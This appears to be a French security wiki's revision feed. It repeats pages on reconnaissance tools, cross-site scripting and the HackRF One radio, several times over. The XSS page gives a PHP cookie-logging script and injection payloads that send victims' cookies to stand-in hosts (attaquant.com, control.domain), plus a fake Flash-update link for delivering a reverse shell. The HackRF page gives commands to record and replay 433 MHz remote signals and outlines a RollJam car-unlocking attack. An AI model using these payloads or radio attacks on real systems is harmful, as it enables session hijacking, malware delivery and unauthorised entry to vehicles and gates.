$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T14:51:48Z

OldNeib : /* OWASP ZAP */

Hacking:Recherche d'information sur cible

2023-12-02T14:48:39Z

OldNeib : /* CMSEEK */

Hacking:Recherche d'information sur cible

2023-12-02T14:46:40Z

OldNeib : /* WPScan */

Hacking:Recherche d'information sur cible

2023-12-02T14:45:22Z

OldNeib : /* MITMproxy */

Hacking:Recherche d'information sur cible

2023-12-02T14:38:17Z

OldNeib :

Hacking:Recherche d'information sur cible

2023-12-02T14:12:57Z

OldNeib :

Web:Cross-Site Scripting - XSS

2023-12-02T14:10:54Z

OldNeib : /* Cheat Sheet */

Web:Cross-Site Scripting - XSS

2023-12-02T14:09:13Z

OldNeib : /* Exemple de récupération de cookies */

= Présentation =
Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.

Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: lapin.jpg et comme description: Oh! Trop mignon!.

La page retournée nous renverrait alors l'image sous la forme:

<img src="./lapin.jpg" title="Oh! Trop mignon!" />

Un cas classique d'exploitation serait de remplacer la description: Oh! Trop mignon! par: " /><script>alert('Hacked!');</script>.

Le site nous retournerait alors:

<img src="./lapin.jpg" title="" /><script>alert('Hacked!');</script>

Ce code HTML étant valide, notre JavaScript sera exécuté au sein du navigateur.

En se débrouillant pour faire afficher cette image à un autre utilisateur, le code s'exécutera cette fois ci dans son navigateur. Il est ainsi possible de récupérer certaines informations sensibles ou alors de faire exécuter quelque action depuis le navigateur de notre cible.

Ici, comme le code injecté est enregistré par le serveur via notre image, quiconque se rendra sur la page où notre image est enregistré se verra exécuter notre script.

= Éxploitation =
== Exemple de récupération de cookies ==
*Préparation du fichier getCookie.php. Celui-ci devra être enregistré de façon `pouvoir être consulté depuis le navigateur de notre cible.

<?php
$cookie = $_GET['v'] . "\n";
file_put_contents("cookies.txt", $cookie, FILE_APPEND | LOCK_EX);
?>

*La victime doit maintenant accéder à notre page:

" /><script>document.location="http://attaquant.com/getCookie.php?v=" + document.cookie;</script><script>document.location="http://control.domain/get.php?v=" + document.cookie;</script>

Une fois arrivé sur la page piégée, l'utilisateur sera redirigé vers notre page avec ses cookies en paramètre. Cookies qui seront enregistrés dans un fichier nommé cookie.txt

== Social Engineering ==
Un exemple d'attaque à adapter selon son imagination:
*Création d'un exécutable type [[Reverse Shell]] ou autre.
*Simulation d'un plugin manquant pour lire ou exécuter un contenu sur le navigateur de notre victime. Ex: "Pour continuer, Flash Player doit être mis à jour." + image utilisée lorsqu'un plugin est réellement manquant.
*Téléchargement de notre faux plugin par la victime, puis exécution.

" /> <a href="http://control.domain/flash_update.exe"><img src="http://control.domain/flash.png" /></a> <p alt="

= Cheat Sheet =
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Web:Cross-Site Scripting - XSS

2023-12-02T14:08:42Z

OldNeib : Page créée avec « = Présentation = Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur. Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: lapin.jpg et comme description: Oh! Trop mignon!.... »

= Présentation =
Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.

Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: lapin.jpg et comme description: Oh! Trop mignon!.

La page retournée nous renverrait alors l'image sous la forme:

<img src="./lapin.jpg" title="Oh! Trop mignon!" />

Un cas classique d'exploitation serait de remplacer la description: Oh! Trop mignon! par: " /><script>alert('Hacked!');</script>.

Le site nous retournerait alors:

<img src="./lapin.jpg" title="" /><script>alert('Hacked!');</script>

Ce code HTML étant valide, notre JavaScript sera exécuté au sein du navigateur.

En se débrouillant pour faire afficher cette image à un autre utilisateur, le code s'exécutera cette fois ci dans son navigateur. Il est ainsi possible de récupérer certaines informations sensibles ou alors de faire exécuter quelque action depuis le navigateur de notre cible.

Ici, comme le code injecté est enregistré par le serveur via notre image, quiconque se rendra sur la page où notre image est enregistré se verra exécuter notre script.

= Éxploitation =
== Exemple de récupération de cookies ==
*Préparation du fichier getCookie.php. Celui-ci devra être enregistré de façon `pouvoir être consulté depuis le navigateur de notre cible.

<?php
$cookie = $_GET['v'] . "\n";
file_put_contents("cookies.txt", $cookie, FILE_APPEND | LOCK_EX);
?>

*La victime doit maintenant accéder à notre page:

" /><script>document.location="http://attaquant.com/get.php?v=" + document.cookie;</script><script>document.location="http://control.domain/get.php?v=" + document.cookie;</script>

Une fois arrivé sur la page piégée, l'utilisateur sera redirigé vers notre page avec ses cookies en paramètre. Cookies qui seront enregistrés dans un fichier nommé cookie.txt

== Social Engineering ==
Un exemple d'attaque à adapter selon son imagination:
*Création d'un exécutable type [[Reverse Shell]] ou autre.
*Simulation d'un plugin manquant pour lire ou exécuter un contenu sur le navigateur de notre victime. Ex: "Pour continuer, Flash Player doit être mis à jour." + image utilisée lorsqu'un plugin est réellement manquant.
*Téléchargement de notre faux plugin par la victime, puis exécution.

" /> <a href="http://control.domain/flash_update.exe"><img src="http://control.domain/flash.png" /></a> <p alt="

= Cheat Sheet =
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Hacking:Recherche d'information sur cible

2023-12-02T12:57:07Z

OldNeib : /* Nmap */

Hacking:Recherche d'information sur cible

2023-12-02T12:56:18Z

OldNeib : /* Dirb */

= Nmap =
Nmap est un outil d'exploration réseau et un scanneur de ports.
$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap
ou
$ nmap -h

= Dirb =
Dirb est un scanneur de contenu web, il va servir à énumérer des dossiers potentiellement présents sur une cible donnée.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
CMS Detection and Exploitation suite

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
Black box WordPress vulnerability scanner

Hacking:Recherche d'information sur cible

2023-12-02T12:55:57Z

OldNeib : /* Dirb */

Hacking:Recherche d'information sur cible

2023-12-02T12:50:08Z

OldNeib : /* Nmap */

= Nmap =
Nmap est un outil d'exploration réseau et un scanneur de ports.
$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap
ou
$ nmap -h

= Dirb =
dirb - Web Content Scanner

= CMSEEK =
CMS Detection and Exploitation suite

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
Black box WordPress vulnerability scanner

Hacking:Recherche d'information sur cible

2023-12-02T11:46:25Z

OldNeib : Page créée avec « = Nmap = Nmap est un outil d'exploration réseau et un scanneur de ports. = Dirb = dirb - Web Content Scanner = CMSEEK = CMS Detection and Exploitation suite = Nikto = nikto - Scan web server for known vulnerabilities = WPScan = Black box WordPress vulnerability scanner »

= Nmap =
Nmap est un outil d'exploration réseau et un scanneur de ports.

= Dirb =
dirb - Web Content Scanner

= CMSEEK =
CMS Detection and Exploitation suite

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
Black box WordPress vulnerability scanner

Tools:HackRF One

2023-12-02T11:14:56Z

OldNeib : /* HackRF One */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T11:01:29Z

OldNeib : /* GPS Spoofing */

== HackRF One ==
Le HackRF One de Great Scott Gadgets est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération, HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T10:59:21Z

OldNeib : /* Radio Jamming */

== HackRF One ==
Le HackRF One de Great Scott Gadgets est une radio définie par logiciel capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération, HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

